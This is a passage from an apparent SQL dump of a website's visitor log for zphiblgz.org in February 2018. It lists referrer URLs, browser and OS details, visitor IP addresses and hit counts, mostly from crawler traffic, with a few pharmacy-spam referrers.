hiblgz.org','Unknown','Unknown','Unknown','','173.252.115.36','000',1,0),(19985,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(19986,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',6,0),(19987,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.12','000',1,0),(19988,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.185','000',1,0),(19989,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',1,0),(19990,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',1,0),(19991,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',1,0),(19992,'2018-02-07','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.152','000',1,0),(19993,'2018-02-07','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.88.45','000',2,0),(19994,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(19995,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.214','000',1,0),(19996,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.192','000',2,0),(19997,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',2,0),(19998,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',1,0),(19999,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',2,0),(20000,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',1,0),(20001,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',1,0),(20002,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.80','000',1,0),(20003,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.216','000',1,0),(20004,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.208','000',2,0),(20005,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.199','000',1,0),(20006,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',1,0),(20007,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',1,0),(20008,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.67','000',1,0),(20009,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.214','000',1,0),(20010,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.93','000',1,0),(20011,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.52','000',2,0),(20012,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.185','000',2,0),(20013,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.106.122','000',1,0),(20014,'2018-02-07','https://zphiblgz.org','Opera','Unknown','9.15','','87.106.48.6','000',1,0),(20015,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.116','000',1,0),(20016,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.96','000',1,0),(20017,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.214','000',1,0),(20018,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.243','000',2,0),(20019,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.186','000',2,0),(20020,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.248','000',1,0),(20021,'2018-02-07','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(20022,'2018-02-07','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.242','000',1,0),(20023,'2018-02-07','https://zphiblgz.org','Firefox','Windows','53.0','','95.163.4.52','000',3,0),(20024,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.90','000',2,0),(20025,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(20026,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',2,0),(20027,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(20028,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',1,0),(20029,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',2,0),(20030,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(20031,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',1,0),(20032,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(20033,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',3,0),(20034,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',2,0),(20035,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(20036,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',1,0),(20037,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(20038,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',2,0),(20039,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',2,0),(20040,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.56','000',1,0),(20041,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(20042,'2018-02-07','https://zphiblgz.org','Chrome','Linux','47.0.2526.35','','62.210.24.247','000',22,0),(20043,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',1,0),(20044,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',2,0),(20045,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(20046,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',2,0),(20047,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',2,0),(20048,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',1,0),(20049,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',2,0),(20050,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(20051,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',2,0),(20052,'2018-02-08','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.108','','192.198.80.227','000',1,0),(20053,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',4,0),(20054,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',3,0),(20055,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',2,0),(20056,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',2,0),(20057,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',3,0),(20058,'2018-02-08','https://zphiblgz.org/','Safari','iPhone','11.0','','98.117.57.119','000',4,0),(20059,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(20060,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(20061,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',1,0),(20062,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',2,0),(20063,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',3,0),(20064,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',1,0),(20065,'2018-02-08','https://zphiblgz.org','Safari','Macintosh','5.1.9','','88.99.27.172','000',1,0),(20066,'2018-02-08','https://zphiblgz.org','Firefox','Windows','21.0','','78.46.90.120','000',1,0),(20067,'2018-02-08','https://r.search.yahoo.com/_ylt=AwrBT83L7Hta7XgAMd5XNyoA;_ylu=X3oDMTByZnU4cmNpBGNvbG8DYmYxBHBvcwM5BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1518099788/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=spL2tmCyEdjhQNL4dbCwfwYgYtg-','MSIE','Windows','11.0','','172.75.151.72','000',1,0),(20068,'2018-02-08','https://pills24h.com/buy-levitra-online-without-prescription/','MSIE','Windows','6.0','','37.115.184.155','000',3,0),(20069,'2018-02-08','https://pillscheap24h.com/','MSIE','Windows','2.0','','178.137.82.153','000',3,0),(20070,'2018-02-08','https://zphiblgz.org','Firefox','Windows','40.1','','103.225.137.38','000',2,0),(20071,'2018-02-08','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',2,0),(20072,'2018-02-08','http://vgoloveboli.net/','MSIE','Windows','6.0','','188.163.79.63','000',2,0),(20073,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','67.205.125.31','000',2,0),(20074,'2018-02-08','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(20075,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',1,0),(20076,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(20077,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',2,0),(20078,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',2,0),(20079,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.18','000',1,0),(20080,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',1,0),(20081,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','149.56.185.74','000',2,0),(20082,'2018-02-08','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(20083,'2018-02-08','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',2,0),(20084,'2018-02-08','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(20085,'2018-02-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(20086,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.k_3RtMxOnrJKPiIOSZfmw-onr3bgfAdN0vtmEaIjXl0.5dfa556f1f0d078ce4034e8e8844791d2d5649bc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cDZpd3JNdHo3alRKejJ4ckxhZ2ZEQks4clY3Vks0bzlJakU5WWVOVW9rdyws&sign=e197d7f13157e35ff06b1d690888561b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.187.8','000',2,0),(20087,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.0CIddSGSHZ02-3GDO0OqCvcqTQvYtMgC4AvIK3qvIvk.9663a7577d4b8a624d537ea2a4c68225d163437f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042clJjVWF1ZU10QTVtUzZpV3ZjYjBraHFGZW44azVKWHNkSFFQZ0t2OVFXUSws&sign=e8bac34f94232db9abdb2b3120092707&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.35.127','000',2,0),(20088,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.OajE7ky1eFJfeo6AMOSiWaafxoCXQ8yuaeMyOm-cNfI.d2daac0b0ef22d06af310c65bd6026cb39b2de99&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040VkNOMjdfZThZR0xweFFFWUZMRXRTWXdKLUV1eTFGQUNUMnRhNWQwaEkzQSws&sign=18cbee4d101dc7170001d48500f45890&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','142.44.160.221','000',2,0),(20089,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.Kecegz6NP6IqSUnetLzTw1VW0LRRw0xinQWQhPS0JLQ.aa3e4fa6f10d49c78d36937aadc06d121f66b681&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZFAwZU5Db1BadzYxMWZBeHpmRTQwcFFYRElDUHBuc1V2OHBpdUV1VENrZyws&sign=c18b11584b98a3eeb3f24ae27689d06f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.203.179','000',2,0),(20090,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.clxAcS7iFBeA_581bKsRy0lEMrHZdJRZBqL2YOZSOso.a66ff267951e132e567532a4b5c139b8384c1866&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041LXoydlFDVEVNU0FQNm81WkFSRGU0Und0T1Z6eFMwRWQ4eHh5VDVQNHA3USws&sign=9ce6cde1e2ec5db138a9fa470337366f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','151.80.126.209','000',2,0),(20091,'2018-02-08','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1691.vlpq_LO8LGaiKLSbPCkUKxapOhigc9c8aulFlF6_Nlc.2476550bb0e1ded1176d9e7fd93c03ab6ca17905&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040M0JrbkVTYmlHazR0Y3IzZDR1VXlzT1hZOFJteFJzdmlTRy01WERvbi1yUSws&sign=563d5f3755f07569c8b750860d54cc28&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.75.10.253','000',2,0),(20092,'2018-02-08','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(20093,'2018-02-08','http://zphiblgz.org/wp-admin/logo_img.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(20094,'2018-02-08','https://zphiblgz.org','Edge','Windows','15.15063','','71.121.163.209','000',4,0),(20095,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.217','000',2,0),(20096,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',1,0),(20097,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',4,0),(20098,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',1,0),(20099,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',2,0),(20100,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',3,0),(20101,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(20102,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',1,0),(20103,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',2,0),(20104,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',1,0),(20105,'2018-02-08','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',2,0),(20106,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(20107,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',2,0),(20108,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(20109,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',1,0),(20110,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',1,0),(20111,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',1,0),(20112,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',1,0),(20113,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',3,0),(20114,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',2,0),(20115,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',2,0),(20116,'2018-02-08','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjgn7nDz5bZAhVS3FMKHZW6AWsQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','162.129.251.92','000',5,0),(20117,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',4,0),(20118,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',2,0),(20119,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',1,0),(20120,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(20121,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',1,0),(20122,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',3,0),(20123,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(20124,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(20125,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',3,0),(20126,'2018-02-08','https://zphiblgz.org','Go--client','Unknown','1.1','','174.138.63.96','000',1,0),(20127,'2018-02-08','http://zphiblgz.org','Go--client','Unknown','2.0','','174.138.63.96','000',1,0),(20128,'2018-02-08','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.102','000',1,0),(20129,'2018-02-08','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.4','000',1,0),(20130,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',6,0),(20131,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',3,0),(20132,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',3,0),(20133,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(20134,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(20135,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',2,0),(20136,'2018-02-08','https://www.google.com/','Safari','Macintosh','11.0.2','','73.135.34.60','000',2,0),(20137,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',5,0),(20138,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',1,0),(20139,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',2,0),(20140,'2018-02-08','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(20141,'2018-02-08','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.31','000',1,0),(20142,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',2,0),(20143,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.224','000',2,0),(20144,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(20145,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.65','000',1,0),(20146,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',1,0),(20147,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',1,0),(20148,'2018-02-08','https://zphiblgz.org','Firefox','Windows','40.1','','95.76.0.141','000',2,0),(20149,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.87.249.184','000',2,0),(20150,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',1,0),(20151,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',2,0),(20152,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.91','000',1,0),(20153,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',1,0),(20154,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',1,0),(20155,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.85','000',1,0),(20156,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',1,0),(20157,'2018-02-08','https://zphiblgz.org','MSIE','Windows','11.0','','204.126.132.241','000',2,0),(20158,'2018-02-08','https://zphiblgz.org/membership/','Opera Next','Windows','49.0.2725.47','','109.86.71.21','000',2,0),(20159,'2018-02-08','https://www.google.com/','Chrome','Windows','63.0.3239.132','','131.171.200.2','000',2,0),(20160,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.201','000',2,0),(20161,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',1,0),(20162,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(20163,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.17','000',1,0),(20164,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.216','000',1,0),(20165,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.114','000',2,0),(20166,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.214','000',1,0),(20167,'2018-02-08','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','94.73.147.98','000',2,0),(20168,'2018-02-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',6,0),(20169,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(20170,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(20171,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.154','000',1,0),(20172,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.183','000',2,0),(20173,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',2,0),(20174,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',3,0),(20175,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',2,0),(20176,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',3,0),(20177,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(20178,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(20179,'2018-02-08','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.138','000',1,0),(20180,'2018-02-08','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.38','000',1,0),(20181,'2018-02-08','http://zphiblgz.org/cache/v12/get_started','MSIE','Windows','10.0','','65.19.167.131','000',1,0),(20182,'2018-02-08','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.80','000',1,0),(20183,'2018-02-08','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(20184,'2018-02-08','https://zphiblgz.org','MSIE','Windows','8.0','','52.200.221.20','000',1,0),(20185,'2018-02-08','http://zphiblgz.org/cache/v12/get_started','MSIE','Windows','11.0','','84.51.135.50','000',2,0),(20186,'2018-02-08','http://zphiblgz.org/cache/v12/get_started','MSIE','Windows','11.0','','89.234.157.254','000',2,0),(20187,'2018-02-08','http://zphiblgz.org/cache/v12/get_started','Safari','iPhone','10.0','','173.239.221.5','000',2,0),(20188,'2018-02-08','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.84','','52.59.102.42','000',1,0),(20189,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.209','000',1,0),(20190,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',1,0),(20191,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',1,0),(20192,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.217','000',3,0),(20193,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.86','000',1,0),(20194,'2018-02-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(20195,'2018-02-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',4,0),(20196,'2018-02-08','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.59','000',2,0),(20197,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',2,0),(20198,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.241','000',3,0),(20199,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(20200,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.93','000',1,0),(20201,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.49','000',2,0),(20202,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.212','000',2,0),(20203,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.222','000',1,0),(20204,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',1,0),(20205,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.91','000',1,0),(20206,'2018-02-08','https://search.yahoo.com/','Chrome','Windows','63.0.3239.132','','69.195.247.116','000',5,0),(20207,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',2,0),(20208,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',3,0),(20209,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(20210,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(20211,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',2,0),(20212,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',1,0),(20213,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',1,0),(20214,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(20215,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',3,0),(20216,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',2,0),(20217,'2018-02-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','6